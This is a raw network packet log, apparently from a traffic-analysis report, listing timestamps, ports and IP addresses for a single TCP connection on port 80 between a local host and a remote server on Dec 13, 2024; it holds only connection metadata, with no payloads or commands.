Dec 13, 2024 18:53:23.093884945 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.093957901 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.093975067 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.094259977 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.096347094 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.096467018 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.096484900 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.096745968 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.099144936 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.099335909 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.100162029 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.100364923 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.101875067 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.102022886 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.102174997 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.102174997 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.104741096 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.104790926 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.105423927 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.105423927 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.107161999 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.107336998 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.107342958 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.107625008 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.109766960 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.109853983 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.109874010 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.110178947 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.112428904 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.112535954 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.112540007 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.113054991 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.114969969 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.115075111 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.115081072 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.115226030 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.117593050 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.117671013 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.117671013 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.117810011 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.120173931 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.120275974 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.120313883 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.120479107 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.122807980 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.122905016 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.122910976 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.122962952 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.125437975 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.125545025 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.125551939 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.125811100 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.128014088 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.128128052 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.128161907 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.128339052 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.130665064 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.130779028 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.130815029 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.130959988 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.133265018 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.133359909 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.133366108 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.133606911 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.135844946 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.135972023 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.135983944 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.136413097 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.138434887 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.138547897 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.138554096 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.138807058 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.141128063 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.141204119 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.141222954 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.141352892 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.143670082 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.143763065 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.144233942 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.144233942 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.145806074 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.145869017 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.145900965 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.146037102 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.147708893 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.147852898 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.147875071 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.148190022 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.149718046 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.149785042 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.149808884 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.150332928 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.151689053 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.151781082 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.152228117 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.152228117 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.153610945 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.153743982 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.153748989 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.153798103 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.155601978 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.155721903 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.156502962 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.156502962 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.157558918 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.157627106 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.157655001 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.157809973 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.159568071 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.159672022 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.159764051 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.159828901 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.161557913 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.161655903 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.161691904 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.161746979 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.163460970 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.163510084 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.163598061 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.163598061 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.165483952 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.165515900 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.165808916 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.165808916 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.167432070 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.167531013 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.167567015 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.167985916 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.169359922 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.169430017 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.169451952 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.169504881 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.171361923 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.171448946 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.280925035 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.280991077 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.281011105 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.281042099 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.281629086 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.281693935 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.281732082 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.281794071 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.283240080 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.283298969 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.283381939 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.283381939 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.284713030 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.284847975 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.284873009 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.284950018 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.286201000 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.286326885 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.286335945 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.286434889 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.287735939 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.287806034 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.287817001 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.287857056 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.289272070 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.289320946 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.289366007 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.289809942 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.290633917 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.290723085 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.291003942 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.291003942 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.292094946 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.292201996 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.292511940 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.292511940 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.293515921 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.293584108 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.293617010 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.293812990 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.294933081 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.295026064 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.295267105 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.295268059 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.296339035 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.296621084 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.296641111 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.296680927 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.297775984 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.297857046 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.297880888 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.298823118 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.299189091 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.299288034 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.299345970 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.299345970 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.300604105 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.300762892 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.300774097 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.300831079 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.302002907 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.302073002 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.302150965 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.302246094 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.303412914 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.303529024 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.303534031 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.303632021 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.304824114 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.304908991 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.304927111 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.305110931 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.306255102 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.306368113 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.306390047 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.306442976 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.307646990 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.307791948 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.308360100 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.308360100 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.309056044 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.309175968 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.309437990 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.309437990 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.310477018 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.310530901 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.310599089 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.311333895 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.311887026 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.311996937 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.312762022 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.312762022 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.313308954 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.313417912 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.313440084 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.313739061 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.314690113 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.314836025 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.314871073 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.314913988 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.316157103 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.316247940 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.316257954 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.316400051 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.317562103 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.317620039 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.317647934 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.317770004 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.318933010 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.318999052 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.319073915 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.319283962 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.320399046 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.320550919 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.320596933 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.320596933 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.321788073 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.321857929 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.321935892 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.322340965 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.323266983 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.323337078 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.323409081 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.323508978 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.324603081 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.324681997 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.324712038 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.325045109 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.326035976 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.326145887 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.326173067 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.326191902 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.327438116 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.327523947 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.327526093 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.327579021 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.328831911 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.329061031 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.329082012 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.329118967 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.330255032 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.330322027 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.330389977 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.330389977 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.331692934 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.331792116 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.331815004 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.331893921 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.333096981 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.333184004 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.333189964 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.333285093 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.334552050 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.334649086 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.334672928 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.334726095 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.335993052 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.336095095 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.336133003 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.336173058 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.337433100 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.337488890 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.337491035 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.337543011 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.338794947 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.338887930 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.338893890 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.339086056 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.340157986 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.340312004 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.340332985 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.340388060 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.341536045 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.341586113 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.341694117 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.341813087 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.342963934 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.343077898 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.343099117 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.343143940 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.344536066 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.344651937 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.344665051 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.345072031 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.345787048 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.345907927 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.345948935 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.345974922 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.347219944 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.347333908 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.347356081 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.347431898 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.348622084 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.348687887 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.348741055 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.348825932 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.350011110 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.350085020 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.350200891 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.350280046 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.351408005 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.351464987 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.351583958 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.351747036 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.352874041 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.352930069 CET	49847	80	192.168.2.7	45.11.183.55
